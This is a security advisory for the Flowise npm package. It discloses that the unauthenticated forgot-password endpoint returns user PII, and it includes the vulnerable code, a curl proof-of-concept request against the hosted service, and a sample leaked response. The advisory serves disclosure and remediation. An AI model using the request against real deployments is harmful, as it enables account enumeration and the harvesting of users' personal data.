GHSA-jc5m-wrp2-qq38
Suggest an improvement- Source
- https://github.com/advisories/GHSA-jc5m-wrp2-qq38
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-jc5m-wrp2-qq38/GHSA-jc5m-wrp2-qq38.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-jc5m-wrp2-qq38
- Published
- 2026-03-05T21:58:02Z
- Modified
- 2026-03-05T22:18:46.445073Z
- Severity
-
- 6.9 (Medium) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:N/SA:N CVSS Calculator
- Summary
- Flowise Vulnerable to PII Disclosure on Unauthenticated Forgot Password Endpoint
- Details
-
Summary
The
/api/v1/account/forgot-passwordendpoint returns the full user object including PII (id, name, email, status, timestamps) in the response body instead of a generic success message. This exposes sensitive user information to unauthenticated attackers who only need to know a valid email address.Vulnerability Details
| Field | Value | |-------|-------| | CWE | CWE-200: Exposure of Sensitive Information to an Unauthorized Actor | | Affected File |
packages/server/src/enterprise/services/account.service.ts(lines 517-545) | | Endpoint |POST /api/v1/account/forgot-password| | Authentication | None required | | CVSS 3.1 | 3.7 (Low) |Root Cause
In
account.service.ts, theforgotPasswordmethod returns the sanitized user object instead of a simple success acknowledgment:public async forgotPassword(data: AccountDTO) { // ... const user = await this.userService.readUserByEmail(data.user.email, queryRunner) if (!user) throw new InternalFlowiseError(StatusCodes.NOT_FOUND, UserErrorMessage.USER_NOT_FOUND) data.user = user // ... password reset logic ... return sanitizeUser(data.user) // Returns user object with PII }The
sanitizeUserfunction only removes sensitive authentication fields:export function sanitizeUser(user: Partial<User>) { delete user.credential // password hash delete user.tempToken // reset token delete user.tokenExpiry return user // Still contains: id, name, email, status, createdDate, updatedDate }Impact
An unauthenticated attacker can:
- Harvest PII: Collect user IDs, full names, and account metadata
- Profile users: Determine account creation dates and activity patterns
- Enumerate accounts: Confirm email existence and gather associated data
- Enable further attacks: Use harvested data for social engineering or targeted phishing
Exploitation
curl -X POST "https://cloud.flowiseai.com/api/v1/account/forgot-password" \ -H "Content-Type: application/json" \ -d '{"user":{"email":"victim@example.com"}}'Evidence
Request:
POST /api/v1/account/forgot-password HTTP/1.1 Host: cloud.flowiseai.com Content-Type: application/json {"user":{"email":"vefag54010@naprb.com"}}Response (201 Created):
{ "id": "56c3fc72-4e85-49c9-a4b5-d1a46b373a12", "name": "Vefag naprb", "email": "vefag54010@naprb.com", "status": "active", "createdDate": "2026-01-17T15:21:59.152Z", "updatedDate": "2026-01-17T15:35:06.492Z", "createdBy": "56c3fc72-4e85-49c9-a4b5-d1a46b373a12", "updatedBy": "56c3fc72-4e85-49c9-a4b5-d1a46b373a12" }<img width="1582" height="791" alt="screenshot" src="https://github.com/user-attachments/assets/9880f037-6e21-41d7-a7c8-7057c6775b50" />
Exposed Data
| Field | Risk | |-------|------| |
id| Internal user UUID - enables targeted attacks | |name| Full name - PII disclosure | |email| Email confirmation | |status| Account state information | |createdDate| User profiling | |updatedDate| Activity tracking | |createdBy/updatedBy| Internal reference leak |Expected Behavior
A secure forgot-password endpoint should return a generic response regardless of whether the email exists:
{"message": "If this email exists, a password reset link has been sent."}References
- Database specific
{ "github_reviewed": true, "github_reviewed_at": "2026-03-05T21:58:02Z", "cwe_ids": [ "CWE-200" ], "severity": "MODERATE", "nvd_published_at": null }- References
Affected packages
npm / flowise
Package
- Name
- flowise
- View open source insights on deps.dev
- Purl
- pkg:npm/flowise